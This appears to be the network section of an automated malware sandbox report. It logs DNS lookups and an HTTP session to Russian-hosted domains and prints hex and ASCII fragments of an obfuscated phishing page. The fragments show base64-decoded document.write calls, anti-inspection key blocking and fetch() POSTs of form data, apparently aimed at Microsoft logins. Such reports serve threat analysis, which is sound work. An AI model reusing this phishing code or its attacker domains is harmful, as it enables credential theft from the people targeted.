                                                          Jan 16, 2025 05:17:52.799504042 CET192.168.2.41.1.1.10xb09cStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:52.799787045 CET192.168.2.41.1.1.10xc58bStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                          Jan 16, 2025 05:18:08.648252010 CET192.168.2.41.1.1.10x1ff1Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:18:08.648423910 CET192.168.2.41.1.1.10x7f00Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                          Jan 16, 2025 05:18:34.388942003 CET192.168.2.41.1.1.10x1ef1Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:18:34.389103889 CET192.168.2.41.1.1.10xf7aaStandard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 16, 2025 05:17:28.380429029 CET1.1.1.1192.168.2.40xb572No error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:28.380471945 CET1.1.1.1192.168.2.40x95dNo error (0)www.google.com65IN (0x0001)false
                                                          Jan 16, 2025 05:17:29.932346106 CET1.1.1.1192.168.2.40x1b91No error (0)guf1.xemirax.ru104.21.85.129A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:29.932346106 CET1.1.1.1192.168.2.40x1b91No error (0)guf1.xemirax.ru172.67.205.187A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:30.074069977 CET1.1.1.1192.168.2.40xb30aNo error (0)guf1.xemirax.ru65IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.080044031 CET1.1.1.1192.168.2.40x78b7No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.080044031 CET1.1.1.1192.168.2.40x78b7No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.080044031 CET1.1.1.1192.168.2.40x78b7No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.080044031 CET1.1.1.1192.168.2.40x78b7No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.080564976 CET1.1.1.1192.168.2.40xaa43No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.080564976 CET1.1.1.1192.168.2.40xaa43No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.082012892 CET1.1.1.1192.168.2.40x7094No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.082041025 CET1.1.1.1192.168.2.40xc491No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.082149029 CET1.1.1.1192.168.2.40x3054No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.082149029 CET1.1.1.1192.168.2.40x3054No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.826061964 CET1.1.1.1192.168.2.40x5f9dNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.826061964 CET1.1.1.1192.168.2.40x5f9dNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.826098919 CET1.1.1.1192.168.2.40xe13cNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.858818054 CET1.1.1.1192.168.2.40x1e7eNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.858818054 CET1.1.1.1192.168.2.40x1e7eNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.858818054 CET1.1.1.1192.168.2.40x1e7eNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:31.858818054 CET1.1.1.1192.168.2.40x1e7eNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:32.396382093 CET1.1.1.1192.168.2.40x97d6No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:32.396382093 CET1.1.1.1192.168.2.40x97d6No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:32.396507025 CET1.1.1.1192.168.2.40x9b63No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 16, 2025 05:17:32.408258915 CET1.1.1.1192.168.2.40xcee4No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:32.408258915 CET1.1.1.1192.168.2.40xcee4No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:32.408709049 CET1.1.1.1192.168.2.40xbbb7No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 16, 2025 05:17:34.389843941 CET1.1.1.1192.168.2.40x674cNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:46.872303963 CET1.1.1.1192.168.2.40xb3f9No error (0)dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ru65IN (0x0001)false
                                                          Jan 16, 2025 05:17:46.912691116 CET1.1.1.1192.168.2.40x915fNo error (0)dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ru104.21.42.208A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:46.912691116 CET1.1.1.1192.168.2.40x915fNo error (0)dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ru172.67.166.74A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:48.488471031 CET1.1.1.1192.168.2.40x548fNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 05:17:48.488550901 CET1.1.1.1192.168.2.40x8e8No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 05:17:48.549345970 CET1.1.1.1192.168.2.40xe4f3No error (0)dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ru104.21.42.208A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:48.549345970 CET1.1.1.1192.168.2.40xe4f3No error (0)dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ru172.67.166.74A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:48.584960938 CET1.1.1.1192.168.2.40x1cf7No error (0)dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ru65IN (0x0001)false
                                                          Jan 16, 2025 05:17:49.542535067 CET1.1.1.1192.168.2.40x898bNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 05:17:49.542535067 CET1.1.1.1192.168.2.40x898bNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 05:17:49.577799082 CET1.1.1.1192.168.2.40x62dfNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 05:17:49.577799082 CET1.1.1.1192.168.2.40x62dfNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 05:17:50.674437046 CET1.1.1.1192.168.2.40xe2f1No error (0)shed.dual-low.s-part-0036.t-0009.t-msedge.nets-part-0036.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 05:17:50.674437046 CET1.1.1.1192.168.2.40xe2f1No error (0)s-part-0036.t-0009.t-msedge.net13.107.246.64A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:51.687207937 CET1.1.1.1192.168.2.40x9568No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 05:17:51.687207937 CET1.1.1.1192.168.2.40x9568No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 05:17:51.732088089 CET1.1.1.1192.168.2.40xb4f4No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 05:17:51.732088089 CET1.1.1.1192.168.2.40xb4f4No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 05:17:51.758495092 CET1.1.1.1192.168.2.40x176aNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 05:17:51.758495092 CET1.1.1.1192.168.2.40x176aNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 05:17:52.806334019 CET1.1.1.1192.168.2.40xb09cNo error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 05:17:52.807064056 CET1.1.1.1192.168.2.40xc58bNo error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 05:18:08.655136108 CET1.1.1.1192.168.2.40x1ff1No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 05:18:08.655917883 CET1.1.1.1192.168.2.40x7f00No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 05:18:34.395754099 CET1.1.1.1192.168.2.40x1ef1No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 05:18:34.395994902 CET1.1.1.1192.168.2.40xf7aaNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                          • guf1.xemirax.ru
                                                          • https:
                                                            • challenges.cloudflare.com
                                                            • code.jquery.com
                                                            • cdnjs.cloudflare.com
                                                            • dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ru
                                                          • a.nel.cloudflare.com
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449741104.21.85.1294432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:30 UTC664OUTGET /6XAVE/ HTTP/1.1
                                                          Host: guf1.xemirax.ru
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-User: ?1
                                                          Sec-Fetch-Dest: document
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:30 UTC1246INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:30 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Cache-Control: no-cache, private
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r1kHDNiKfpAMuQCHGEyI2phDPq%2Bo5xcgKjBB3wGg%2FIFSfTTJ8FEVpalqslI%2BnksSHUTCXpe%2FyAv7e7WNEzWtkzXkbnXG7vC5dlLNns19J%2BhbUefIQ7orjEWFizsBIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4909&min_rtt=4892&rtt_var=1409&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1567&delivery_rate=569030&cwnd=251&unsent_bytes=0&cid=0c196366a7cc5f80&ts=170&x=0"
                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6IlA5K2E4Ti9mZENIS3lsQXVLVGdHL3c9PSIsInZhbHVlIjoiUThJL3ZoV1R3aXU5U0lvT0lWaFcrMGZiK0VVc0JaZkUvakxiNk1FdE5mOXZzNGJxdTNEK0ZLUllmQURxejNmRjd5M0JqWUF6bFMxMjJLdVJTd2JhdzlrTFphUW1OVW5GTEFQV1Y4QldNemVReVJNbzdZSGwrOThyTXMrMTNwSXgiLCJtYWMiOiJmZDdiYzAzMTY3OTUwYTFkZmZlM2MxYTY2MmI1MTVjYzc5ODc2MjBmZTQ3NzAwMTNkOWMzYmI3ZTkwMjkzNzI5IiwidGFnIjoiIn0%3D; expires=Thu, 16-Jan-2025 06:17:30 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                          2025-01-16 04:17:30 UTC733INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 63 7a 5a 47 74 54 62 6e 46 36 53 32 78 32 4f 48 67 77 54 6e 46 32 57 53 74 54 4e 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 64 6d 78 4d 61 47 74 53 51 53 74 59 64 6e 56 43 4c 33 42 44 52 6e 4a 46 65 58 4e 56 4f 45 78 5a 4d 54 5a 79 5a 47 31 33 54 31 49 77 59 55 68 55 4b 31 52 58 61 45 56 72 57 69 39 5a 52 6b 78 55 4b 79 38 33 59 7a 4a 56 61 54 46 68 62 6c 42 70 64 54 46 55 4e 30 31 33 53 48 4e 4a 52 45 35 6a 57 6e 46 43 62 57 74 71 64 6c 52 48 59 32 4a 51 55 57 6b 35 62 33 70 4b 64 31 6c 61 4d 47 46 74 64 6c 56 6e 64 56 49 72 5a 6d 35 73 52 57 52 4c 4e 6d 74 74 57 47 46 4c 4e 6d 78 4f 64 45 34 72 64 7a 64 45 63 53 74 57 56 55 77
                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlczZGtTbnF6S2x2OHgwTnF2WStTN3c9PSIsInZhbHVlIjoidmxMaGtSQStYdnVCL3BDRnJFeXNVOExZMTZyZG13T1IwYUhUK1RXaEVrWi9ZRkxUKy83YzJVaTFhblBpdTFUN013SHNJRE5jWnFCbWtqdlRHY2JQUWk5b3pKd1laMGFtdlVndVIrZm5sRWRLNmttWGFLNmxOdE4rdzdEcStWVUw
                                                          2025-01-16 04:17:30 UTC1369INData Raw: 31 34 39 64 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 45 76 65 72 79 20 70 72 6f 62 6c 65 6d 20 69 73 20 61 6e 20 6f 70 70 6f 72 74 75 6e 69 74 79 20 69 6e 20 64 69 73 67 75 69 73 65 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 48 64 55 59 78 4c 6e 68 6c 62 57 6c 79 59 58 67 75 63 6e 55 76 4e 6c 68 42 56 6b 55 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30
                                                          Data Ascii: 149d<script>/* Every problem is an opportunity in disguise. */if(atob("aHR0cHM6Ly9HdUYxLnhlbWlyYXgucnUvNlhBVkUv") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0
                                                          2025-01-16 04:17:30 UTC1369INData Raw: 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4f 54 68 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 49 47 46 31 64 47 38 37 66 51 30 4b 49 32 6c 6d 61 55 6c 4f 52 32 39 72 5a 45 67 67 4c 6e 52 6c 65
                                                          Data Ascii: 50YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogOThweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI2lmaUlOR29rZEggLnRle
                                                          2025-01-16 04:17:30 UTC1369INData Raw: 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4d 79 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58
                                                          Data Ascii: 0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZX
                                                          2025-01-16 04:17:30 UTC1178INData Raw: 62 6c 68 6e 57 48 41 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 47 6c 43 55 6d 4a 7a 62 6c 68 6e 57 48 41 67 4c 53 42 4f 61 32 5a 4a 52 46 70 6f 63 6c 4a 76 49 44 34 67 64 6b 70 4e 53 33 52 59 56 55 6c 6d 62 79 41 6d 4a 69 41 68 55 6c 5a 4f 53 48 46 52 56 33 6c 59 56 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 5a 30 56 48 53 57 5a 6d 54 31 64 35 54 43 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 53 56 6b 35 49 63 56 46 58 65 56 68 58 49 44 30 67 64 48 4a 31 5a 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 35 79 5a 58 42
                                                          Data Ascii: blhnWHAgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKGlCUmJzblhnWHAgLSBOa2ZJRFpoclJvID4gdkpNS3RYVUlmbyAmJiAhUlZOSHFRV3lYVykgew0KICAgICAgICAgICAgZ0VHSWZmT1d5TCA9IHRydWU7DQogICAgICAgICAgICBSVk5IcVFXeVhXID0gdHJ1ZTsNCiAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5yZXB
                                                          2025-01-16 04:17:30 UTC1369INData Raw: 63 39 31 0d 0a 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 32 59 57 78 31 5a 54 30 69 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 64 57 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 31 59 53 49 67 64 6d 46 73 64 57 55 39 49 6c 56 75 61 32 35 76 64 32 34 69 50 67 30 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 52 6c 65 48
                                                          Data Ascii: c91IiBuYW1lPSJibHRkcmVmIiB2YWx1ZT0iIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkdWEiIG5hbWU9ImJsdGR1YSIgdmFsdWU9IlVua25vd24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGRkYXRhIiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9InRleH
                                                          2025-01-16 04:17:30 UTC1369INData Raw: 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 79 5a 58 4e 77 62 32 35 7a 5a 53 35 30 5a 58 68 30 4b 43 6b 4e 43 69 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 48 52 6c 65 48 51 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 47 6c 6d 4b 48 52 6c 65 48 51 67 50 54 30 67 4d 43 6c 37 44 51 6f 67 49 43 41 67 5a 6d 56 30 59 32 67 6f 5a 6c 64 74 56 57 68 53 54 33 56 50 65 69 77 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 74 5a 58 52 6f 62 32 51 36 49 43 4a 51 54 31 4e 55 49 69 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 59 6d 39 6b 65 54 6f 67 62 6d 56 33 49 45 5a 76 63 6d 31 45 59 58 52 68 4b 45 31 72 5a 31 4e 7a 51 6c 52 6e 63 6b 45 70 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68
                                                          Data Ascii: LnRoZW4ocmVzcG9uc2UgPT4gew0KICAgIHJldHVybiByZXNwb25zZS50ZXh0KCkNCiAgICB9KS50aGVuKHRleHQgPT4gew0KICAgIGlmKHRleHQgPT0gMCl7DQogICAgZmV0Y2goZldtVWhST3VPeiwgew0KICAgICAgICBtZXRob2Q6ICJQT1NUIiwNCiAgICAgICAgYm9keTogbmV3IEZvcm1EYXRhKE1rZ1NzQlRnckEpDQogICAgfSkudGh
                                                          2025-01-16 04:17:30 UTC486INData Raw: 0d 0a 63 6f 6e 73 74 20 75 56 4e 42 77 77 44 43 4d 63 20 3d 20 6e 65 77 20 55 52 4c 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 48 64 55 59 78 4c 6e 68 6c 62 57 6c 79 59 58 67 75 63 6e 55 76 4e 6c 68 42 56 6b 55 76 22 29 29 3b 0d 0a 63 6f 6e 73 74 20 44 75 44 69 6f 66 45 75 4c 71 20 3d 20 75 56 4e 42 77 77 44 43 4d 63 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 4c 76 61 74 72 6d 61 54 49 49 20 3f 20 75 56 4e 42 77 77 44 43 4d 63 2e 68 6f 73 74 6e 61 6d 65 20 3a 20 75 56 4e 42 77 77 44 43 4d 63 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 2f 2a 20 53 74 6f 70 20 63 68 61 73 69 6e 67 20 74 68 65 20 6d 6f 6e 65 79 20 61 6e 64 20 73 74 61 72 74 20 63 68 61 73 69 6e 67
                                                          Data Ascii: const uVNBwwDCMc = new URL(atob("aHR0cHM6Ly9HdUYxLnhlbWlyYXgucnUvNlhBVkUv"));const DuDiofEuLq = uVNBwwDCMc.hostname === LvatrmaTII ? uVNBwwDCMc.hostname : uVNBwwDCMc.hostname.split('.').slice(-2).join('.');/* Stop chasing the money and start chasing
                                                          2025-01-16 04:17:30 UTC1369INData Raw: 32 30 65 39 0d 0a 63 6f 6e 73 74 20 54 78 6a 7a 4d 49 47 52 69 72 20 3d 20 75 56 4e 42 77 77 44 43 4d 63 2e 70 61 74 68 6e 61 6d 65 2b 27 2f 27 3b 0d 0a 69 66 28 54 78 6a 7a 4d 49 47 52 69 72 20 3d 3d 20 4d 46 54 6b 4c 47 66 75 64 67 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58 4a 35 4c 54 4d 75 4e 69
                                                          Data Ascii: 20e9const TxjzMIGRir = uVNBwwDCMc.pathname+'/';if(TxjzMIGRir == MFTkLGfudg){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi
